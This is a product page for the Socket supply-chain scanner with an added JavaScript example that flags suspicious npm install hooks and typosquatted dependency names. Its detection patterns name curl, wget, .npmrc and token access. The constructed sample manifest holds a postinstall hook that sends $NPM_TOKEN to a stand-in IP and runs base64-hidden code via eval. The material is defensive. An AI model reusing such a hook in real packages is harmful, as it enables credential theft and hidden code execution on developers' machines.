Security Intelligence

Scan Your Dependencies.
Know Your Risk.

Paste or upload a package.json to instantly surface supply chain threats — malware, typosquatting, install script hijacking, and more.

No key? Just hit scan — we'll use a demo key so you can try it instantly. Have one? It stays in your browser and is sent only to Socket. Get a free API key →

What Socket Would Have Done

If Socket had been installed on this repository from day one, here's how it would have protected your team — automatically, before any code shipped.

GitHub PR Firewall

Socket's GitHub App would have blocked any pull request introducing a flagged package — displaying an inline warning with a one-click override workflow, long before the dependency reached production.

Real-Time Install Script Detection

Socket scans preinstall / install / postinstall hooks for network calls, filesystem writes, credential access, and obfuscated code. Lifecycle scripts run arbitrary commands with the developer's privileges the moment a package is installed, which makes them a primary vector in npm supply chain compromises, so Socket alerts before the package reaches a developer's machine rather than after npm install has already executed the hook.

Typosquatting & Dependency Confusion

Socket's deep package intelligence would have flagged any lookalike package names — such as character-swap variants of popular libraries — before a developer ever ran npm install, preventing credential theft or backdoor injection.
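To make the two checks above concrete, here is an added example of a minimal heuristic scanner that reads a package.json, flags lifecycle scripts showing network, filesystem-write, credential-access or obfuscation signals, and flags dependency names within one edit (including a character swap) of a well-known package. This is illustration code written for this page, not Socket's implementation: the popular-package list, the regular expressions, the TEST-NET address and the sample manifest are all constructed, and a real scanner would run the script checks over each dependency's own manifest from the registry rather than over the root manifest alone.

```javascript
// Added example (not Socket's code). Heuristic scan of a package.json for
// suspicious install hooks and typosquatted dependency names.

// Constructed allowlist of popular names; a real tool would use registry download data.
const POPULAR_PACKAGES = ["lodash", "express", "react", "axios", "chalk", "commander"];

// npm lifecycle hooks that run automatically during install.
const INSTALL_HOOKS = ["preinstall", "install", "postinstall", "prepare"];

// Constructed heuristics; each hit is a reason for a human to look, not proof of malice.
const SCRIPT_PATTERNS = [
  { id: "network", re: /\b(curl|wget)\b|fetch\(|https?:\/\/|net\.connect/ },
  { id: "fs-write", re: /\b(writeFileSync|writeFile|appendFileSync|createWriteStream)\b|\s>>?\s*\S/ },
  { id: "credential-access", re: /\.npmrc|\.ssh\b|\$\{?[A-Z_]*(TOKEN|KEY|SECRET)/ },
  { id: "obfuscation", re: /\beval\(|new Function\(|base64|\\x[0-9a-fA-F]{2}|fromCharCode|atob\(/ },
];

// Optimal string alignment distance: Levenshtein plus adjacent transposition,
// so a character swap such as lodash -> lodahs costs 1 rather than 2.
function editDistance(a, b) {
  const d = Array.from({ length: a.length + 1 }, () => new Array(b.length + 1).fill(0));
  for (let i = 0; i <= a.length; i++) d[i][0] = i;
  for (let j = 0; j <= b.length; j++) d[0][j] = j;
  for (let i = 1; i <= a.length; i++) {
    for (let j = 1; j <= b.length; j++) {
      const cost = a[i - 1] === b[j - 1] ? 0 : 1;
      d[i][j] = Math.min(d[i - 1][j] + 1, d[i][j - 1] + 1, d[i - 1][j - 1] + cost);
      if (i > 1 && j > 1 && a[i - 1] === b[j - 2] && a[i - 2] === b[j - 1]) {
        d[i][j] = Math.min(d[i][j], d[i - 2][j - 2] + 1); // transposition
      }
    }
  }
  return d[a.length][b.length];
}

// Returns a list of findings: {type: "install-script", hook, signal} or
// {type: "typosquat", package, lookalike}.
function scanPackageJson(manifestJson) {
  const pkg = JSON.parse(manifestJson);
  const findings = [];

  // 1. Install-script hijacking: inspect every lifecycle hook that runs on install.
  const scripts = pkg.scripts || {};
  for (const hook of INSTALL_HOOKS) {
    const cmd = scripts[hook];
    if (!cmd) continue;
    for (const { id, re } of SCRIPT_PATTERNS) {
      if (re.test(cmd)) findings.push({ type: "install-script", hook, signal: id });
    }
  }

  // 2. Typosquatting: a name one edit away from a popular package, but not that package.
  const deps = { ...(pkg.dependencies || {}), ...(pkg.devDependencies || {}) };
  for (const name of Object.keys(deps)) {
    if (POPULAR_PACKAGES.includes(name)) continue;
    for (const popular of POPULAR_PACKAGES) {
      if (editDistance(name, popular) <= 1) {
        findings.push({ type: "typosquat", package: name, lookalike: popular });
      }
    }
  }
  return findings;
}

// Constructed sample manifest: a postinstall hook that exfiltrates a token to a
// TEST-NET address, writes the response to disk and runs base64-hidden code,
// plus two lookalike dependency names (lodahs is a swap, expres a deletion).
const SAMPLE_MANIFEST = JSON.stringify({
  name: "example-app",
  scripts: {
    postinstall: `curl -s http://203.0.113.5/c -d "$NPM_TOKEN" > /tmp/.resp && node -e "eval(Buffer.from('Y29uc29sZS5sb2coMSk=','base64').toString())"`,
    build: "tsc",
  },
  dependencies: { lodahs: "^4.17.21", expres: "^4.18.2", react: "^18.2.0" },
});

console.log(JSON.stringify(scanPackageJson(SAMPLE_MANIFEST), null, 2));
```

Run with `node scan.js`; the sample yields four install-script signals on the postinstall hook and two typosquat findings (lodahs → lodash, expres → express), while `react` is left alone because it is the genuine popular name. The distance threshold and pattern list are deliberately tight to keep false positives low; widening either without a reviewer in the loop is how a scanner becomes noise.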

Continuous Monitoring, Zero Config

Once installed, Socket monitors your full dependency graph continuously — not just at install time. New malware signatures, newly-flagged maintainer accounts, and license drift all trigger automatic alerts without any additional developer action.